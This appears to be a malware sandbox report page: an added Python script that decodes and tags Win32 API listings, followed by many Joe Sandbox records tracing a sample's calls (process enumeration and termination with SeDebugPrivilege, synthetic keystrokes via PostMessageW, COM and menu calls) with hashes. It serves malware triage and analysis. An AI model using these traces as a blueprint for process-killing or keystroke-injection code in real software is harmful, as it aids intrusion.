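The "APIs" listings in these records are easier to triage once the hex stack slots are decoded: in the record at 00E02F0A the PostMessageW calls carry 0x0100 (WM_KEYDOWN) and 0x0101 (WM_KEYUP) with virtual keys 0x25 (VK_LEFT) and 0x27 (VK_RIGHT) after AttachThreadInput, i.e. synthetic keystrokes into another thread's window, and in the record above OpenProcess is called with desired access 0x00000001 (PROCESS_TERMINATE) after a Toolhelp32 process walk, with TerminateProcess and the string SeDebugPrivilege alongside. The script below is an added example for reading such listings; it is not Joe Sandbox code and not code from the analysed Setup.exe. It parses lines in the report's format, decodes the constants named above from the public Win32 headers, and applies a few hypothetical triage rules (the rule names, the function names parse_api_listing, decode_call, tag_function and summarize, and the sample excerpts, which are copied from the two records named, are all this example's own). One caveat it encodes: the report prints raw stack slots, so a call such as Sleep shows five "arguments" while only the first is its real parameter, and "?" marks a slot the analyser could not resolve.

```python
"""Decode a Joe Sandbox 'APIs' listing into call descriptions and behaviour tags.

Added example for reading these report records; not code from Joe Sandbox or
from the analysed sample. The sample listings below are constructed excerpts
copied from the page's own records.
"""
import re
from collections import Counter

# One listing entry, e.g.
#   • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E02F4E
#   • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants from the public Win32 headers (winuser.h / winnt.h).
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR"}
VIRTUAL_KEYS = {0x0D: "VK_RETURN", 0x1B: "VK_ESCAPE", 0x25: "VK_LEFT",
                0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}

# Hypothetical triage rules (this example's own): a tag fires when every
# listed API name occurs in the record, direct call or subcall.
BEHAVIOUR_RULES = [
    ("process-termination", {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"}),
    ("keystroke-injection", {"AttachThreadInput", "PostMessageW"}),
    ("wininet-download", {"InternetConnectW", "InternetOpenUrlW"}),
    ("thread-with-duplicated-handles", {"DuplicateHandle", "CreateThread"}),
    ("menu-manipulation", {"GetMenuItemInfoW", "SetMenuItemInfoW"}),
]


def parse_api_listing(text):
    """Parse listing lines; '?' slots become None, hex slots become ints.

    The report prints raw stack slots, so a call may show more slots than its
    prototype has parameters (Sleep with five); only the first N are real.
    """
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = (m.group("args") or "").strip()
        args = ([None if a.strip() == "?" else int(a.strip(), 16)
                 for a in raw.split(",")] if raw else [])
        calls.append({"name": m.group("name"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16),
                      "subcall": m.group("sub")})
    return calls


def describe_access(mask):
    """Expand an OpenProcess desired-access mask into PROCESS_* rights."""
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) or "0"


def decode_call(call):
    """Render one call with the slots an analyst wants decoded."""
    name, args = call["name"], call["args"]
    arg = lambda i: args[i] if i < len(args) else None
    if name in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"):
        msg, wparam = arg(1), arg(2)          # (hWnd, Msg, wParam, lParam)
        if msg in WINDOW_MESSAGES:
            key = ("vk=?" if wparam is None
                   else VIRTUAL_KEYS.get(wparam, f"vk=0x{wparam:02X}"))
            return f"{name} {WINDOW_MESSAGES[msg]} {key}"
        return name if msg is None else f"{name} msg=0x{msg:04X}"
    if name == "OpenProcess":                 # (dwDesiredAccess, bInheritHandle, dwProcessId)
        access = arg(0)
        return f"{name} access={'?' if access is None else describe_access(access)}"
    return name


def tag_function(calls, strings=()):
    """Apply BEHAVIOUR_RULES; `strings` are the record's String ID values."""
    names = {c["name"] for c in calls}
    tags = [tag for tag, needed in BEHAVIOUR_RULES if needed <= names]
    # AttachThreadInput is also used for plain focus handling: require a key message.
    if "keystroke-injection" in tags and not any("WM_KEY" in decode_call(c) for c in calls):
        tags.remove("keystroke-injection")
    if "process-termination" in tags and "SeDebugPrivilege" in strings:
        tags.append("debug-privilege")       # kills are meant to reach protected processes too
    return tags


def summarize(text, strings=()):
    calls = parse_api_listing(text)
    return {"calls": [decode_call(c) for c in calls],
            "histogram": Counter(c["name"] for c in calls),
            "tags": tag_function(calls, strings)}


# Constructed excerpts copied from the two records discussed above.
SAMPLE_KEYSTROKE = """\
  • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
  • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
  • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E02F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E02F2C
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E02F4E
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E02F70
"""
SAMPLE_PROCKILL = """\
  • Part of subcall function 00E0DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E0DDAC
  • Part of subcall function 00E0DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E0DDBA
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2ABCA
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2ACC5
• CloseHandle.KERNEL32(00000000), ref: 00E2AD21
"""

if __name__ == "__main__":
    for label, text, strs in (("keystrokes", SAMPLE_KEYSTROKE, ()),
                              ("process kill", SAMPLE_PROCKILL, ("SeDebugPrivilege",))):
        s = summarize(text, strs)
        print(label, s["tags"])
        for line in s["calls"]:
            print("   ", line)
```

Point it at a whole report by feeding each record's APIs block to summarize and passing the record's String ID values as `strings`; the histogram it returns is the same name multiset the report's API ID summarises, which makes it a convenient key for grouping records across samples.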
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: f0e6be8ccf8aa72d58977dfc6d12024a5c5d93eb3829db09f53cd4171a951fee
• Instruction ID: c1c145b920c9c2ae0ad5b51b2f9eb4751bbdaf69aec1425cc25edbb0e0f4d06f
                                                                                                                                                                              • Opcode Fuzzy Hash: f0e6be8ccf8aa72d58977dfc6d12024a5c5d93eb3829db09f53cd4171a951fee
                                                                                                                                                                              • Instruction Fuzzy Hash: 8761A1742082519FD320DF15D899F25BBE1EF54318F1888ACE4665B7A3C771EC89CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E343C1
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E343D6
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E343F0
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E34435
                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E34462
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E34490
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                              • API String ID: 2147712094-78025650
                                                                                                                                                                              • Opcode ID: 1bd51fbd8ccf45fba6b8e04d81a7a2ff73cbed67a999182c06ddbf907ce71e5f
                                                                                                                                                                              • Instruction ID: ec9cd6aa1042549a3756e5dc5268123dfe6a906eb8673de52c00163b6e2d08a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd51fbd8ccf45fba6b8e04d81a7a2ff73cbed67a999182c06ddbf907ce71e5f
                                                                                                                                                                              • Instruction Fuzzy Hash: B241A0B1A00309ABDB219F64CC49BEA7BA9EF48354F10112AF954F72D1D775A984CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0C6C4
                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 00E0C6E4
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00E0C71A
                                                                                                                                                                              • GetMenuItemCount.USER32(01706A50), ref: 00E0C76B
                                                                                                                                                                              • InsertMenuItemW.USER32(01706A50,?,00000001,00000030), ref: 00E0C793
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                              • String ID: 0$2
                                                                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                                                                              • Opcode ID: 74bce92fe108c5bf34b47ea14b24a384d8d4b0c83ef4d635b7f5b2d75f0bf1a0
                                                                                                                                                                              • Instruction ID: 756fb982d05d22dd6fd300c07f2ee5f413bb32325b7a4e431957ed1054fd341e
                                                                                                                                                                              • Opcode Fuzzy Hash: 74bce92fe108c5bf34b47ea14b24a384d8d4b0c83ef4d635b7f5b2d75f0bf1a0
                                                                                                                                                                              • Instruction Fuzzy Hash: 06516C70600205ABDF20CF78D888BAEBBF5AF54318F38525AEA11B72D1D7709985CF61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E38740
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E38765
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E3877D
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00E387A6
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E1C1F2,00000000), ref: 00E387C6
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00E387B1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2294984445-2063206799
                                                                                                                                                                              • Opcode ID: d31edda3397ac9c6feaee36f0806cbb6f39f45a5e7778c1009a0210451e8d14d
                                                                                                                                                                              • Instruction ID: f7dec9d6582afaeb00ea5606edbfb14b273b5b4520457ee658c89a74b0b243ba
                                                                                                                                                                              • Opcode Fuzzy Hash: d31edda3397ac9c6feaee36f0806cbb6f39f45a5e7778c1009a0210451e8d14d
                                                                                                                                                                              • Instruction Fuzzy Hash: 30219071614345AFCB159F39DD0CA6A3FA6EB85329F35562AFA26E21E0DE308854CB10
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 642191829-3771769585
                                                                                                                                                                              • Opcode ID: c932c71b6e9743f0a27ba2fe232b523c3d266ae824e0ad1bb852e108888c7783
                                                                                                                                                                              • Instruction ID: 9d63d7854913bee5e83a2a9ea2a194d842b8cff753bc01876bdef1d5b29550a4
                                                                                                                                                                              • Opcode Fuzzy Hash: c932c71b6e9743f0a27ba2fe232b523c3d266ae824e0ad1bb852e108888c7783
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E11E431904219BFDB246B60EC4AFEA7BACDF01714F04017AF515B71A1EE749AC58A70
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$LocalTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 952045576-0
                                                                                                                                                                              • Opcode ID: d1860c87e6728aeef9e3c050b71a32fa70b55e216e142d2c1395014912de20ff
                                                                                                                                                                              • Instruction ID: db6b6004d8d9449808eba0f6467a0a646f5237daafd4fc76155e783d1e91224c
                                                                                                                                                                              • Opcode Fuzzy Hash: d1860c87e6728aeef9e3c050b71a32fa70b55e216e142d2c1395014912de20ff
                                                                                                                                                                              • Instruction Fuzzy Hash: 2F418265C11119B5CB11EBF88C8AFDFB7A8EF05310F54846AE518E3161FA34D2A5C3B6
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00E337B7
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00E337BF
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E337CA
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E337D6
                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E33812
                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E33823
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E36504,?,?,000000FF,00000000,?,000000FF,?), ref: 00E3385E
                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E3387D
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00DE194E
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE19D1
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00DE1B7B,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE1A64
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE1A7B
  • Part of subcall function 00DD3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00DE1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DE1AF7
• __freea.LIBCMT ref: 00DE1B22
• __freea.LIBCMT ref: 00DE1B2E
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
APIs
Strings
Similarity
• API ID: Variant$ClearInit
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2610073882-625585964
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E11C1B
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11C43
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E11C67
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11C97
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11D1E
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11D83
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E11DEF
Similarity
• API ID: ArraySafe$Data$Access$UnaccessVartype
• String ID:
• API String ID: 2550207440-0
APIs
• VariantInit.OLEAUT32(?), ref: 00E243C8
• CharUpperBuffW.USER32(?,?), ref: 00E244D7
• _wcslen.LIBCMT ref: 00E244E7
• VariantClear.OLEAUT32(?), ref: 00E2467C
  • Part of subcall function 00E1169E: VariantInit.OLEAUT32(00000000), ref: 00E116DE
  • Part of subcall function 00E1169E: VariantCopy.OLEAUT32(?,?), ref: 00E116E7
  • Part of subcall function 00E1169E: VariantClear.OLEAUT32(?), ref: 00E116F3
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
APIs
  • Part of subcall function 00E008FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?,?,00E00C4E), ref: 00E0091B
  • Part of subcall function 00E008FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00936
  • Part of subcall function 00E008FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00944
  • Part of subcall function 00E008FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?), ref: 00E00954
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E256AE
• _wcslen.LIBCMT ref: 00E257B6
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E2582C
• CoTaskMemFree.OLE32(?), ref: 00E25837
Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                              • API String ID: 614568839-2785691316
                                                                                                                                                                              • Opcode ID: c933705d84f5116ffea4f5d5e853a151b15921c8c0ba3517c3119d7631b103ad
                                                                                                                                                                              • Instruction ID: 69fd006bac3133d9b1f86038c881572dafd3732c495bca4ecab4753a4fb27983
                                                                                                                                                                              • Opcode Fuzzy Hash: c933705d84f5116ffea4f5d5e853a151b15921c8c0ba3517c3119d7631b103ad
                                                                                                                                                                              • Instruction Fuzzy Hash: FC91E472D00229AFDF14DFA4DC81AEEBBB9EF08314F10456AE915B7251DB709A45CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenu.USER32(?), ref: 00E32C1F
                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00E32C51
                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E32C79
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E32CAF
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00E32CE9
                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00E32CF7
                                                                                                                                                                                • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
                                                                                                                                                                                • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
                                                                                                                                                                                • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E32D7F
                                                                                                                                                                                • Part of subcall function 00E0F292: Sleep.KERNEL32 ref: 00E0F30A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4196846111-0
                                                                                                                                                                              • Opcode ID: 788e46930212bda8c35be6e56e562a55ca7fcecbd5ea329d361476aaffde2083
                                                                                                                                                                              • Instruction ID: c4fec7376bb30bc63259b9bffe087aae21a073e84d2133e99352df1441890494
                                                                                                                                                                              • Opcode Fuzzy Hash: 788e46930212bda8c35be6e56e562a55ca7fcecbd5ea329d361476aaffde2083
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C719B75A00205AFCB00EF65C849AAEBBF1EF48314F149859E956FB251DB34AE41CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(?), ref: 00E0B8C0
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00E0B8D5
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00E0B936
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E0B964
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E0B983
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E0B9C4
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E0B9E7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
